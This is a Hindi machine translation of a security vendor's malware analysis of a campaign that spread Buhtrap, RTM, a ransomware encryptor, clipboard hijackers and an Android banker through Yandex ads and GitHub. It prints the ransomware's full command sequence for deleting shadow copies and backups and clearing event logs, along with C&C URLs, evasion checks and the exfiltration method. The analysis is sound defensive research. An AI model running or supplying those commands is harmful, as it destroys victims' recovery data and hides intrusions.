बैकडोर और बुहट्रैप एन्क्रिप्टर को Yandex.Direct का उपयोग करके वितरित किया गया था

साइबर हमले में एकाउंटेंट को लक्षित करने के लिए, आप उन कार्य दस्तावेज़ों का उपयोग कर सकते हैं जिन्हें वे ऑनलाइन खोजते हैं। यह मोटे तौर पर वही है जो एक साइबर समूह पिछले कुछ महीनों से कर रहा है, ज्ञात बैकडोर वितरित कर रहा है। बुहत्रप и RTM, साथ ही क्रिप्टोकरेंसी चुराने के लिए एन्क्रिप्टर और सॉफ़्टवेयर। अधिकांश लक्ष्य रूस में स्थित हैं। यह हमला Yandex.Direct पर दुर्भावनापूर्ण विज्ञापन देकर किया गया था। संभावित पीड़ितों को एक वेबसाइट पर निर्देशित किया गया जहां उन्हें दस्तावेज़ टेम्पलेट के रूप में छिपी एक दुर्भावनापूर्ण फ़ाइल डाउनलोड करने के लिए कहा गया। हमारी चेतावनी के बाद यांडेक्स ने दुर्भावनापूर्ण विज्ञापन हटा दिया।

बुहट्रैप का सोर्स कोड पिछले दिनों ऑनलाइन लीक हो गया है इसलिए कोई भी इसका उपयोग कर सकता है। हमें आरटीएम कोड उपलब्धता के संबंध में कोई जानकारी नहीं है।

इस पोस्ट में हम आपको बताएंगे कि कैसे हमलावरों ने Yandex.Direct का उपयोग करके मैलवेयर वितरित किया और इसे GitHub पर होस्ट किया। पोस्ट मैलवेयर के तकनीकी विश्लेषण के साथ समाप्त होगी।

बुहट्रैप और आरटीएम व्यवसाय में वापस आ गए हैं

प्रसार का तंत्र और पीड़ित

पीड़ितों को वितरित किए गए विभिन्न पेलोड एक सामान्य प्रसार तंत्र साझा करते हैं। हमलावरों द्वारा बनाई गई सभी दुर्भावनापूर्ण फ़ाइलें दो अलग-अलग GitHub रिपॉजिटरी में रखी गई थीं।

आमतौर पर, रिपॉजिटरी में एक डाउनलोड करने योग्य दुर्भावनापूर्ण फ़ाइल होती है, जो बार-बार बदलती रहती है। चूँकि GitHub आपको रिपॉजिटरी में परिवर्तनों का इतिहास देखने की अनुमति देता है, हम देख सकते हैं कि एक निश्चित अवधि के दौरान कौन सा मैलवेयर वितरित किया गया था। पीड़ित को दुर्भावनापूर्ण फ़ाइल डाउनलोड करने के लिए मनाने के लिए, ऊपर दिए गए चित्र में दिखाई गई वेबसाइटblanki-shabloni24[.]ru का उपयोग किया गया था।

साइट का डिज़ाइन और दुर्भावनापूर्ण फ़ाइलों के सभी नाम एक ही अवधारणा का पालन करते हैं - फॉर्म, टेम्प्लेट, अनुबंध, नमूने, आदि। यह देखते हुए कि बुहट्रैप और आरटीएम सॉफ़्टवेयर का उपयोग पहले से ही एकाउंटेंट पर हमलों में किया जा चुका है, हमने मान लिया कि नये अभियान में रणनीति वही है. एकमात्र सवाल यह है कि पीड़ित हमलावरों की वेबसाइट तक कैसे पहुंचा।

संक्रमण

इस साइट पर आने वाले कम से कम कई संभावित पीड़ित दुर्भावनापूर्ण विज्ञापन से आकर्षित हुए थे। नीचे एक उदाहरण URL है:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

जैसा कि आप लिंक से देख सकते हैं, बैनर वैध अकाउंटिंग फोरम bb.f2[.]kz पर पोस्ट किया गया था। यह ध्यान रखना महत्वपूर्ण है कि बैनर अलग-अलग साइटों पर दिखाई दिए, सभी में एक ही अभियान आईडी (blanki_rsya) थी, और अधिकांश लेखांकन या कानूनी सहायता सेवाओं से संबंधित थे। यूआरएल से पता चलता है कि संभावित पीड़ित ने "इनवॉइस फॉर्म डाउनलोड करें" अनुरोध का उपयोग किया था, जो लक्षित हमलों की हमारी परिकल्पना का समर्थन करता है। नीचे वे साइटें हैं जहां बैनर दिखाई दिए और संबंधित खोज क्वेरीज़ दी गई हैं।

• इनवॉइस फॉर्म डाउनलोड करें - bb.f2[.]kz
• नमूना अनुबंध - Ipopen[.]ru
• आवेदन शिकायत नमूना - 77मेट्रोव[.]आरयू
• समझौता प्रपत्र - ब्लैंक-डोगोवोर-कुपली-प्रोदाज़ी[.]आरयू
• नमूना अदालत याचिका - zen.yandex[.]ru
• नमूना शिकायत - yurday[.]ru
• नमूना अनुबंध प्रपत्र - रेगफोरम[.]आरयू
• अनुबंध प्रपत्र - सहायक[.]आरयू
• नमूना अपार्टमेंट समझौता - napravah[.]com
• कानूनी अनुबंधों के नमूने - एविटो[.]आरयू

ब्लैंकी-शब्लोनी24[.]आरयू साइट को एक साधारण दृश्य मूल्यांकन पास करने के लिए कॉन्फ़िगर किया गया हो सकता है। आमतौर पर, एक विज्ञापन जो GitHub के लिंक के साथ एक पेशेवर दिखने वाली साइट की ओर इशारा करता है, वह स्पष्ट रूप से कुछ बुरा नहीं लगता है। इसके अलावा, हमलावरों ने दुर्भावनापूर्ण फ़ाइलें केवल सीमित अवधि के लिए, संभवतः अभियान के दौरान, रिपॉजिटरी में अपलोड कीं। अधिकांश समय, GitHub रिपॉजिटरी में एक खाली ज़िप संग्रह या एक खाली EXE फ़ाइल होती है। इस प्रकार, हमलावर Yandex.Direct के माध्यम से उन साइटों पर विज्ञापन वितरित कर सकते हैं, जिन पर विशिष्ट खोज क्वेरी के जवाब में आने वाले अकाउंटेंट द्वारा जाने की सबसे अधिक संभावना होती है।

आगे, आइए इस प्रकार वितरित विभिन्न पेलोड को देखें।

पेलोड विश्लेषण

वितरण का कालक्रम

दुर्भावनापूर्ण अभियान अक्टूबर 2018 के अंत में शुरू हुआ और लेखन के समय सक्रिय है। चूंकि संपूर्ण रिपॉजिटरी GitHub पर सार्वजनिक रूप से उपलब्ध थी, इसलिए हमने छह अलग-अलग मैलवेयर परिवारों के वितरण की एक सटीक समयरेखा संकलित की (नीचे चित्र देखें)। हमने गिट इतिहास के साथ तुलना के लिए, ईएसईटी टेलीमेट्री द्वारा मापे गए अनुसार, बैनर लिंक की खोज कब हुई थी, यह दिखाने वाली एक पंक्ति जोड़ी है। जैसा कि आप देख सकते हैं, यह GitHub पर पेलोड की उपलब्धता के साथ अच्छी तरह से मेल खाता है। फरवरी के अंत में विसंगति को इस तथ्य से समझाया जा सकता है कि हमारे पास परिवर्तन इतिहास का हिस्सा नहीं था क्योंकि रिपॉजिटरी को पूरी तरह से प्राप्त करने से पहले GitHub से हटा दिया गया था।

चित्र 1. मैलवेयर वितरण का कालक्रम।

कोड हस्ताक्षर प्रमाण पत्र

अभियान में अनेक प्रमाणपत्रों का उपयोग किया गया। कुछ पर एक से अधिक मैलवेयर परिवार द्वारा हस्ताक्षर किए गए थे, जो आगे इंगित करता है कि विभिन्न नमूने एक ही अभियान से संबंधित थे। निजी कुंजी की उपलब्धता के बावजूद, ऑपरेटरों ने बायनेरिज़ पर व्यवस्थित रूप से हस्ताक्षर नहीं किए और सभी नमूनों के लिए कुंजी का उपयोग नहीं किया। फरवरी 2019 के अंत में, हमलावरों ने Google के स्वामित्व वाले प्रमाणपत्र का उपयोग करके अमान्य हस्ताक्षर बनाना शुरू कर दिया, जिसके लिए उनके पास निजी कुंजी नहीं थी।

अभियान में शामिल सभी प्रमाणपत्र और उनके द्वारा हस्ताक्षरित मैलवेयर परिवार नीचे दी गई तालिका में सूचीबद्ध हैं।

हमने अन्य मैलवेयर परिवारों के साथ संबंध स्थापित करने के लिए भी इन कोड हस्ताक्षर प्रमाणपत्रों का उपयोग किया है। अधिकांश प्रमाणपत्रों के लिए, हमें ऐसे नमूने नहीं मिले जो GitHub रिपॉजिटरी के माध्यम से वितरित नहीं किए गए थे। हालाँकि, TOV "MARIYA" प्रमाणपत्र का उपयोग बॉटनेट से संबंधित मैलवेयर पर हस्ताक्षर करने के लिए किया गया था वाउचोस, एडवेयर और खनिक। इसकी संभावना नहीं है कि यह मैलवेयर इस अभियान से संबंधित है. सबसे अधिक संभावना है, प्रमाणपत्र डार्कनेट पर खरीदा गया था।

Win32/फ़ाइलकोडर.Buhtrap

पहला घटक जिसने हमारा ध्यान खींचा वह नया खोजा गया Win32/Filecoder.Buhtrap था। यह एक डेल्फ़ी बाइनरी फ़ाइल है जिसे कभी-कभी पैक किया जाता है। इसे मुख्य रूप से फरवरी-मार्च 2019 में वितरित किया गया था। यह रैंसमवेयर प्रोग्राम के अनुरूप व्यवहार करता है - यह स्थानीय ड्राइव और नेटवर्क फ़ोल्डरों को खोजता है और पता लगाई गई फ़ाइलों को एन्क्रिप्ट करता है। इसमें समझौता करने के लिए इंटरनेट कनेक्शन की आवश्यकता नहीं है क्योंकि यह एन्क्रिप्शन कुंजी भेजने के लिए सर्वर से संपर्क नहीं करता है। इसके बजाय, यह फिरौती संदेश के अंत में एक "टोकन" जोड़ता है, और ऑपरेटरों से संपर्क करने के लिए ईमेल या बिटमेसेज का उपयोग करने का सुझाव देता है।

जितना संभव हो उतने संवेदनशील संसाधनों को एन्क्रिप्ट करने के लिए, Filecoder.Buhtrap कुंजी सॉफ़्टवेयर को बंद करने के लिए डिज़ाइन किया गया एक थ्रेड चलाता है जिसमें खुले फ़ाइल हैंडलर हो सकते हैं जिनमें मूल्यवान जानकारी होती है जो एन्क्रिप्शन में हस्तक्षेप कर सकती है। लक्ष्य प्रक्रियाएं मुख्य रूप से डेटाबेस प्रबंधन प्रणाली (डीबीएमएस) हैं। इसके अलावा, Filecoder.Buhtrap डेटा पुनर्प्राप्ति को कठिन बनाने के लिए लॉग फ़ाइलें और बैकअप हटा देता है। ऐसा करने के लिए, नीचे दी गई बैच स्क्रिप्ट चलाएँ।

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap वेबसाइट आगंतुकों के बारे में जानकारी एकत्र करने के लिए डिज़ाइन की गई एक वैध ऑनलाइन आईपी लॉगर सेवा का उपयोग करता है। इसका उद्देश्य रैंसमवेयर के पीड़ितों को ट्रैक करना है, जो कमांड लाइन की जिम्मेदारी है:

mshta.exe "javascript:document.write('');"

यदि वे तीन बहिष्करण सूचियों से मेल नहीं खाती हैं तो एन्क्रिप्शन के लिए फ़ाइलें चुनी जाती हैं। सबसे पहले, निम्नलिखित एक्सटेंशन वाली फ़ाइलें एन्क्रिप्टेड नहीं हैं: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys और ।बल्ला। दूसरे, वे सभी फ़ाइलें जिनके पूर्ण पथ में निर्देशिका स्ट्रिंग्स हैं, नीचे दी गई सूची से बाहर कर दी गई हैं।

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

तीसरा, कुछ फ़ाइल नामों को भी एन्क्रिप्शन से बाहर रखा गया है, उनमें फिरौती संदेश का फ़ाइल नाम भी शामिल है। सूची नीचे प्रस्तुत की गई है। जाहिर है, इन सभी अपवादों का उद्देश्य मशीन को चालू रखना है, लेकिन न्यूनतम सड़क योग्यता के साथ।

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

फ़ाइल एन्क्रिप्शन योजना

एक बार निष्पादित होने पर, मैलवेयर 512-बिट आरएसए कुंजी जोड़ी उत्पन्न करता है। निजी घातांक (डी) और मापांक (एन) को फिर हार्ड-कोडित 2048-बिट सार्वजनिक कुंजी (सार्वजनिक घातांक और मापांक), ज़्लिब-पैक और बेस 64 एन्कोडेड के साथ एन्क्रिप्ट किया जाता है। इसके लिए जिम्मेदार कोड चित्र 2 में दिखाया गया है।

चित्र 2. 512-बिट आरएसए कुंजी जोड़ी निर्माण प्रक्रिया के हेक्स-किरणों के विघटन का परिणाम।

नीचे जनरेट की गई निजी कुंजी के साथ सादे पाठ का एक उदाहरण दिया गया है, जो फिरौती संदेश से जुड़ा एक टोकन है।

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

हमलावरों की सार्वजनिक कुंजी नीचे दी गई है।

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

फ़ाइलें 128-बिट कुंजी के साथ AES-256-CBC का उपयोग करके एन्क्रिप्ट की गई हैं। प्रत्येक एन्क्रिप्टेड फ़ाइल के लिए, एक नई कुंजी और एक नया आरंभीकरण वेक्टर उत्पन्न होता है। मुख्य जानकारी एन्क्रिप्टेड फ़ाइल के अंत में जोड़ी जाती है। आइए एन्क्रिप्टेड फ़ाइल के प्रारूप पर विचार करें।
एन्क्रिप्टेड फ़ाइलों में निम्नलिखित हेडर हैं:

VEGA मैजिक मान को जोड़ने के साथ स्रोत फ़ाइल डेटा को पहले 0x5000 बाइट्स में एन्क्रिप्ट किया गया है। सभी डिक्रिप्शन जानकारी निम्नलिखित संरचना वाली फ़ाइल से जुड़ी हुई है:

- फ़ाइल आकार मार्कर में एक चिह्न होता है जो दर्शाता है कि फ़ाइल आकार में 0x5000 बाइट्स से बड़ी है या नहीं
- एईएस कुंजी ब्लॉब = ZlibCompress(RSAEncrypt(AES कुंजी + IV, उत्पन्न RSA कुंजी जोड़ी की सार्वजनिक कुंजी))
- RSA कुंजी ब्लॉब = ZlibCompress(RSAEncrypt (उत्पन्न RSA निजी कुंजी, हार्ड-कोडित RSA सार्वजनिक कुंजी))

Win32/क्लिपबैंकर

Win32/ClipBanker एक घटक है जिसे अक्टूबर के अंत से दिसंबर 2018 की शुरुआत तक रुक-रुक कर वितरित किया गया था। इसकी भूमिका क्लिपबोर्ड की सामग्री की निगरानी करना है, यह क्रिप्टोकरेंसी वॉलेट के पते की तलाश करता है। लक्ष्य वॉलेट पता निर्धारित करने के बाद, क्लिपबैंकर इसे उस पते से बदल देता है जो ऑपरेटरों का माना जाता है। जिन नमूनों की हमने जांच की, वे न तो बॉक्सिंग थे और न ही अस्पष्ट थे। व्यवहार को छुपाने के लिए उपयोग किया जाने वाला एकमात्र तंत्र स्ट्रिंग एन्क्रिप्शन है। ऑपरेटर वॉलेट पते RC4 का उपयोग करके एन्क्रिप्ट किए गए हैं। लक्षित क्रिप्टोकरेंसी बिटकॉइन, बिटकॉइन कैश, डॉगकॉइन, एथेरियम और रिपल हैं।

उस अवधि के दौरान जब मैलवेयर हमलावरों के बिटकॉइन वॉलेट में फैल रहा था, वीटीएस को एक छोटी राशि भेजी गई थी, जो अभियान की सफलता पर संदेह पैदा करती है। इसके अतिरिक्त, यह सुझाव देने के लिए कोई सबूत नहीं है कि ये लेनदेन क्लिपबैंकर से संबंधित थे।

Win32/RTM

Win32/RTM घटक को मार्च 2019 की शुरुआत में कई दिनों के लिए वितरित किया गया था। आरटीएम डेल्फ़ी में लिखा गया एक ट्रोजन बैंकर है, जिसका उद्देश्य दूरस्थ बैंकिंग प्रणाली है। 2017 में, ESET शोधकर्ताओं ने प्रकाशित किया विस्तृत विश्लेषण इस कार्यक्रम का विवरण अभी भी प्रासंगिक है। जनवरी 2019 में, पालो ऑल्टो नेटवर्क्स भी रिलीज़ हुआ आरटीएम के बारे में ब्लॉग पोस्ट.

बुहट्रैप लोडर

कुछ समय के लिए, GitHub पर एक डाउनलोडर उपलब्ध था जो पिछले बुहट्रैप टूल के समान नहीं था। वह मुड़ता है https://94.100.18[.]67/RSS.php?<some_id> अगला चरण प्राप्त करने के लिए और इसे सीधे मेमोरी में लोड करता है। हम दूसरे चरण के कोड के दो व्यवहारों को अलग कर सकते हैं। पहले URL में, RSS.php सीधे बुहट्रैप बैकडोर से गुजरा - यह बैकडोर स्रोत कोड के लीक होने के बाद उपलब्ध बैकडोर के समान है।

दिलचस्प बात यह है कि हम बुहट्रैप बैकडोर के साथ कई अभियान देखते हैं, और वे कथित तौर पर विभिन्न ऑपरेटरों द्वारा चलाए जाते हैं। इस मामले में, मुख्य अंतर यह है कि बैकडोर सीधे मेमोरी में लोड होता है और डीएलएल परिनियोजन प्रक्रिया के साथ सामान्य योजना का उपयोग नहीं करता है जिसके बारे में हमने बात की थी से पहले. इसके अलावा, ऑपरेटरों ने नेटवर्क ट्रैफ़िक को C&C सर्वर पर एन्क्रिप्ट करने के लिए उपयोग की जाने वाली RC4 कुंजी को बदल दिया। हमारे द्वारा देखे गए अधिकांश अभियानों में, ऑपरेटरों ने इस कुंजी को बदलने की जहमत नहीं उठाई।

दूसरा, अधिक जटिल व्यवहार यह था कि RSS.php URL को किसी अन्य लोडर को भेज दिया गया था। इसने कुछ अस्पष्टताएं लागू कीं, जैसे गतिशील आयात तालिका का पुनर्निर्माण। बूटलोडर का उद्देश्य C&C सर्वर से संपर्क करना है msiofficeupd[.]com/api/F27F84EDA4D13B15/2, लॉग भेजें और प्रतिक्रिया की प्रतीक्षा करें। यह प्रतिक्रिया को ब्लॉब के रूप में संसाधित करता है, इसे मेमोरी में लोड करता है और निष्पादित करता है। इस लोडर को क्रियान्वित करते हुए हमने जो पेलोड देखा वह वही बुहट्रैप बैकडोर था, लेकिन अन्य घटक भी हो सकते हैं।

एंड्रॉइड/स्पाई.बैंकर

दिलचस्प बात यह है कि GitHub रिपॉजिटरी में Android के लिए एक घटक भी पाया गया था। वह केवल एक दिन - 1 नवंबर, 2018 - मुख्य शाखा में थे। GitHub पर पोस्ट किए जाने के अलावा, ESET टेलीमेट्री को इस मैलवेयर के वितरित होने का कोई सबूत नहीं मिला है।

घटक को एंड्रॉइड एप्लिकेशन पैकेज (एपीके) के रूप में होस्ट किया गया था। यह बहुत ही अस्पष्ट है। दुर्भावनापूर्ण व्यवहार एपीके में स्थित एक एन्क्रिप्टेड JAR में छिपा हुआ है। इसे इस कुंजी का उपयोग करके RC4 के साथ एन्क्रिप्ट किया गया है:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

स्ट्रिंग्स को एन्क्रिप्ट करने के लिए समान कुंजी और एल्गोरिदम का उपयोग किया जाता है। JAR स्थित है APK_ROOT + image/files. फ़ाइल के पहले 4 बाइट्स में एन्क्रिप्टेड JAR की लंबाई होती है, जो लंबाई फ़ील्ड के तुरंत बाद शुरू होती है।

फ़ाइल को डिक्रिप्ट करने के बाद, हमें पता चला कि यह पहले एनुबिस था दस्तावेज एंड्रॉइड के लिए बैंकर। मैलवेयर में निम्नलिखित विशेषताएं हैं:

• माइक्रोफ़ोन रिकॉर्डिंग
• स्क्रीनशॉट ले रहा हूँ
• जीपीएस निर्देशांक प्राप्त करना
• keylogger
• डिवाइस डेटा एन्क्रिप्शन और फिरौती की मांग
• स्पैम भेजना

दिलचस्प बात यह है कि बैंकर ने एक अन्य C&C सर्वर प्राप्त करने के लिए ट्विटर को बैकअप संचार चैनल के रूप में उपयोग किया। जिस नमूने का हमने विश्लेषण किया, उसमें @JonesTrader खाते का उपयोग किया गया था, लेकिन विश्लेषण के समय यह पहले से ही अवरुद्ध था।

बैंकर में एंड्रॉइड डिवाइस पर लक्षित एप्लिकेशन की एक सूची होती है। यह सोफोस अध्ययन में प्राप्त सूची से अधिक लंबी है। सूची में कई बैंकिंग एप्लिकेशन, अमेज़ॅन और ईबे जैसे ऑनलाइन शॉपिंग कार्यक्रम और क्रिप्टोकरेंसी सेवाएं शामिल हैं।

एमएसआईएल/क्लिपबैंकर.आईएच

इस अभियान के हिस्से के रूप में वितरित अंतिम घटक .NET विंडोज़ निष्पादन योग्य था, जो मार्च 2019 में सामने आया। अध्ययन किए गए अधिकांश संस्करण कन्फ्यूज़रएक्स v1.0.0 के साथ पैक किए गए थे। क्लिपबैंकर की तरह, यह घटक क्लिपबोर्ड का उपयोग करता है। उनका लक्ष्य क्रिप्टोकरेंसी की एक विस्तृत श्रृंखला के साथ-साथ स्टीम पर ऑफर भी है। इसके अतिरिक्त, वह बिटकॉइन निजी WIF कुंजी चुराने के लिए आईपी लॉगर सेवा का उपयोग करता है।

सुरक्षा तंत्र
डिबगिंग, डंपिंग और छेड़छाड़ को रोकने में कन्फ्यूज़रएक्स द्वारा प्रदान किए जाने वाले लाभों के अलावा, घटक में एंटीवायरस उत्पादों और वर्चुअल मशीनों का पता लगाने की क्षमता भी शामिल है।

यह सत्यापित करने के लिए कि यह वर्चुअल मशीन में चलता है, मैलवेयर BIOS जानकारी का अनुरोध करने के लिए अंतर्निहित विंडोज WMI कमांड लाइन (WMIC) का उपयोग करता है, अर्थात्:

wmic bios

फिर प्रोग्राम कमांड आउटपुट को पार्स करता है और कीवर्ड ढूंढता है: VBOX, वर्चुअलबॉक्स, XEN, qemu, bochs, VM।

एंटीवायरस उत्पादों का पता लगाने के लिए, मैलवेयर विंडोज सुरक्षा केंद्र को एक विंडोज मैनेजमेंट इंस्ट्रुमेंटेशन (WMI) अनुरोध भेजता है ManagementObjectSearcher एपीआई जैसा कि नीचे दिखाया गया है। बेस64 से डिकोड करने के बाद कॉल इस तरह दिखती है:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

चित्र 3. एंटीवायरस उत्पादों की पहचान करने की प्रक्रिया।

इसके अलावा, मैलवेयर जाँचता है कि क्या क्रिप्टोक्लिपवॉचर, क्लिपबोर्ड हमलों से बचाने के लिए एक उपकरण और, यदि चल रहा है, तो उस प्रक्रिया में सभी थ्रेड्स को निलंबित कर देता है, जिससे सुरक्षा अक्षम हो जाती है।

अटलता

मैलवेयर के जिस संस्करण का हमने अध्ययन किया वह स्वयं इसकी प्रतिलिपि बनाता है %APPDATA%googleupdater.exe और Google निर्देशिका के लिए "छिपी हुई" विशेषता सेट करता है। फिर वह मान बदल देती है SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell विंडोज़ रजिस्ट्री में और पथ जोड़ता है updater.exe. इस तरह, जब भी उपयोगकर्ता लॉग इन करेगा तो मैलवेयर निष्पादित हो जाएगा।

द्वेषपूर्ण व्यवहार

क्लिपबैंकर की तरह, मैलवेयर क्लिपबोर्ड की सामग्री पर नज़र रखता है और क्रिप्टोक्यूरेंसी वॉलेट पते की तलाश करता है, और जब पाया जाता है, तो इसे ऑपरेटर के किसी एक पते से बदल देता है। कोड में जो पाया गया है उसके आधार पर लक्ष्य पतों की एक सूची नीचे दी गई है।

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

प्रत्येक प्रकार के पते के लिए एक संगत नियमित अभिव्यक्ति होती है। STEAM_URL मान का उपयोग स्टीम सिस्टम पर हमला करने के लिए किया जाता है, जैसा कि नियमित अभिव्यक्ति से देखा जा सकता है जिसका उपयोग बफर में परिभाषित करने के लिए किया जाता है:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

निष्कासन चैनल

बफ़र में पते बदलने के अलावा, मैलवेयर बिटकॉइन, बिटकॉइन कोर और इलेक्ट्रम बिटकॉइन वॉलेट की निजी WIF कुंजी को लक्षित करता है। प्रोग्राम WIF निजी कुंजी प्राप्त करने के लिए plogger.org को एक एक्सफ़िल्ट्रेशन चैनल के रूप में उपयोग करता है। ऐसा करने के लिए, ऑपरेटर उपयोगकर्ता-एजेंट HTTP हेडर में निजी कुंजी डेटा जोड़ते हैं, जैसा कि नीचे दिखाया गया है।

चित्र 4. आउटपुट डेटा के साथ आईपी लॉगर कंसोल।

ऑपरेटरों ने वॉलेट को बाहर निकालने के लिए iplogger.org का उपयोग नहीं किया। फ़ील्ड में 255 वर्ण सीमा के कारण संभवतः उन्होंने एक अलग पद्धति का सहारा लिया User-Agentआईपी ​​लॉगर वेब इंटरफ़ेस में प्रदर्शित होता है। हमारे द्वारा अध्ययन किए गए नमूनों में, अन्य आउटपुट सर्वर को पर्यावरण चर में संग्रहीत किया गया था DiscordWebHook. हैरानी की बात यह है कि यह पर्यावरण चर कोड में कहीं भी निर्दिष्ट नहीं है। इससे पता चलता है कि मैलवेयर अभी भी विकासाधीन है और वेरिएबल ऑपरेटर की परीक्षण मशीन को सौंपा गया है।

एक और संकेत है कि कार्यक्रम विकास में है। बाइनरी फ़ाइल में दो iplogger.org URL शामिल हैं, और जब डेटा निकाला जाता है तो दोनों से पूछताछ की जाती है। इनमें से किसी एक यूआरएल के अनुरोध में, रेफरर फ़ील्ड में मान "DEV /" से पहले होता है। हमें एक ऐसा संस्करण भी मिला जो कन्फ्यूज़रएक्स का उपयोग करके पैक नहीं किया गया था, इस यूआरएल के प्राप्तकर्ता का नाम DevFeedbackUrl है। पर्यावरण चर नाम के आधार पर, हमारा मानना ​​​​है कि ऑपरेटर क्रिप्टोकरेंसी वॉलेट को चुराने के लिए वैध सेवा डिस्कॉर्ड और उसके वेब इंटरसेप्शन सिस्टम का उपयोग करने की योजना बना रहे हैं।

निष्कर्ष

यह अभियान साइबर हमलों में वैध विज्ञापन सेवाओं के उपयोग का एक उदाहरण है। यह योजना रूसी संगठनों को लक्षित करती है, लेकिन गैर-रूसी सेवाओं का उपयोग करके इस तरह के हमले को देखकर हमें आश्चर्य नहीं होगा। समझौते से बचने के लिए, उपयोगकर्ताओं को अपने द्वारा डाउनलोड किए जाने वाले सॉफ़्टवेयर के स्रोत की प्रतिष्ठा के प्रति आश्वस्त होना चाहिए।

समझौता संकेतकों और MITER ATT&CK विशेषताओं की पूरी सूची यहां उपलब्ध है लिंक.

स्रोत: www.habr.com